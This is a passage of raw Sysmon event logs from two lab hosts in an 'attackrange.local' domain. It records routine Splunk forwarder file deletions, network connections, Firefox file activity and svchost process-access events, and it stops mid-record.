17141700x80000000000000001054399Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:07:06.453{466BC892-3465-60E8-160C-00000000CF01}6264\chrome.6264.1217.144631910C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001054398Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:06.335{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C4E569A5DEC9A5AACD0CD7F1ADC05CE,SHA256=ABD798FB8BD6026B3058B8C6913771F2F8CA9EB5881B040FE3A31B5D201045B4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054397Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:58.316{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-6118-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001054406Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:07.343{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67297C3EDD61B5E07CE16498881AC6FE,SHA256=D8BE9F40749DF1E1F22251194A041418A63834CE2FA554A1A43A50249CF51D03,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810241Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:06.252{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57454-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 
23542300x8000000000000000810240Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:07.057{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E63EA849E49F1EF198BC75B76F4BEC80,SHA256=2C9E7ACE05E898DE2950137740742266671EE0C83A7A77CCFD9D56561F63CB46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054405Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:07.016{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=30D2E6035CAD857621204B0CD834135B,SHA256=DB5BD2817816EDC8F9581206BE7A803798CB35FE8700A228DE97A1F055D3AF6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054404Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:07.016{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D14BAF98E43BE38173E045C9AA69D8E7,SHA256=15D98960A32AEEB58475A7E9187B9F95AC6E28BCCA6E7DC0A03E4BB302C73E17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054408Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:08.373{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCCD21F646514C9C81C27EC82344A66F,SHA256=437AB98DC63AAB59DBF71E81A030B8040CB9C52D8D6CEF20A2CDB9369ADCBAC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810242Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:08.072{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4C2705B0CE2A9DFFB7B51A1FC17D9DF,SHA256=030CADA4E82DC891BCD7361150300670575AAC4138DB7DBA22D895C59051B9ED,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054407Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:59.579{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61959-false10.0.1.12-8000- 11241100x80000000000000001054413Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:09.519{466BC892-3152-60E8-240B-00000000CF01}3328C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\SiteSecurityServiceState.txt2021-07-09 11:26:57.628 23542300x80000000000000001054412Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:09.519{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\SiteSecurityServiceState.txtMD5=0FA77B01924B1510B06EC68F54F22C2C,SHA256=95908181DBDB5D9389F3C8B96E11087510A6853C37B7392544F14CBC509962B6,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001054411Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:09.388{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06A389AA23F7D6B9A9717E3771375ED4,SHA256=AD92D19AADA1F81ABAA46B5376C3A21C59A3D13A5EF7A80E0A9D13B48BE88D9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810243Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:09.088{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E85403D3CE4D0AE80B4779D3A5E20616,SHA256=15D300FBF14514B922E8EBA1589C757F127F340B49C96F29B6339EB876B9765C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054410Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:00.060{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\bobtcptruefalse10.0.1.14win-dc-890.attackrange.local61960-false104.244.42.130-443https 23542300x80000000000000001054409Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:09.320{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=7D5134B2E5645761A8C7DED34FDC96F4,SHA256=9B801CCB45EF2D4DF833746F14629E854C5132A4A47BAE2E24EF15947B8050E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054428Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:10.404{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D1CB3CDDB57D169CCE2109230D62CE0,SHA256=B2E9F070F34CB2E6DC69941B71386272433C90A91B8658A9A1DB36E0114E661E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810244Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:10.088{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=197AD17C9CE25956DA6845855304967A,SHA256=AF3D2E13CF22606EBB2AB0BAE46FAAA62C99FCBEEC341C65FB1AC408F142151E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054427Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001054426Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054425Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054424Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001054423Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054422Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054421Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001054420Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054419Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054418Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001054417Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054416Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054415Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001054414Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054429Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:11.404{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6C88414B1569BE16A9DEA807ED519E1,SHA256=2D9414E0580397DA30D1CA48F5039E470F7D02ED8EB897DF7C8F8371952150C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810245Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:11.088{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
